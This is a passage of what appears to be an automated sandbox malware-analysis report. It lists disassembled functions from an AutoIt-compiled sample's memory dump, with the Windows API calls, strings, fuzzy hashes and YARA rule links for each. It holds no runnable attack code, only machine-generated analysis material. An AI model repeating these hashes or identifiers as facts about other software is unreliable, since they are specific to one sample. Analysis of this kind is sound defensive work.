                                                                            • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                            • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                            • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                            Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 455545452-1403004172
                                                                            • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                            • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                            • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                            • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                            Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: <local>
                                                                            • API String ID: 2038078732-4266983199
                                                                            • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                            • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                            • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                            • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                            Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 455545452-1403004172
                                                                            • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                            • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                            • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                            • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                            Function 00441C1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID: X+
                                                                            • API String ID: 410705778-1938338529
                                                                            • Opcode ID: f1a10e336183c0ff2b6d957fcf18a3a835ea54dd3f96ed3d36d0cc8343e646a5
                                                                            • Instruction ID: ba536238118c8d010d3f6b0aa660f9f8498b4d39804cd88edc9aab5a1a4e475f
                                                                            • Opcode Fuzzy Hash: f1a10e336183c0ff2b6d957fcf18a3a835ea54dd3f96ed3d36d0cc8343e646a5
                                                                            • Instruction Fuzzy Hash: 4A115E316402019FD320CF69DCC0E67B7A9FB8A324F64861EE564873A1C771A895CB64
                                                                            Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 455545452-1403004172
                                                                            • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                            • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                            • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                            • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                            Function 00447A87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00447AE5
                                                                            • DefDlgProcW.USER32(?,0000002B,?,?,004A83D8,?), ref: 00447B09
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageProcSend
                                                                            • String ID: X+
                                                                            • API String ID: 650375871-1938338529
                                                                            • Opcode ID: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
                                                                            • Instruction ID: cf0c3d739a266ecf9dfb39524e393d8b6385858120b34e0c7784725de632f42e
                                                                            • Opcode Fuzzy Hash: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
                                                                            • Instruction Fuzzy Hash: 8F01DB323002509BD320DF48D888F6BB769EBDA725F14492EFA409B280C7B5B806C775
                                                                            Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _strncmp
                                                                            • String ID: ,$UTF8)
                                                                            • API String ID: 909875538-2632631837
                                                                            • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                            • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                            • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                            • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                            Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _strncmp
                                                                            • String ID: ,$UTF8)
                                                                            • API String ID: 909875538-2632631837
                                                                            • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                            • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                            • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                            • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                            Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • wsprintfW.USER32 ref: 004560E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_mallocwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 1262938277-328681919
                                                                            • Opcode ID: a0b39a4cd3c0c8a7adb8db444dc879b20475413a32e353ad3a6ec36c60b55e02
                                                                            • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                            • Opcode Fuzzy Hash: a0b39a4cd3c0c8a7adb8db444dc879b20475413a32e353ad3a6ec36c60b55e02
                                                                            • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                            Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32 ref: 0044226C
                                                                            • PostMessageW.USER32 ref: 0044227F
                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                            • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                            • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                            • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                            Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32 ref: 00442240
                                                                            • PostMessageW.USER32 ref: 00442247
                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                            • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                            • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                            • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                            Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxW.USER32 ref: 00439522
                                                                              • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                            • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                            • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                            • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E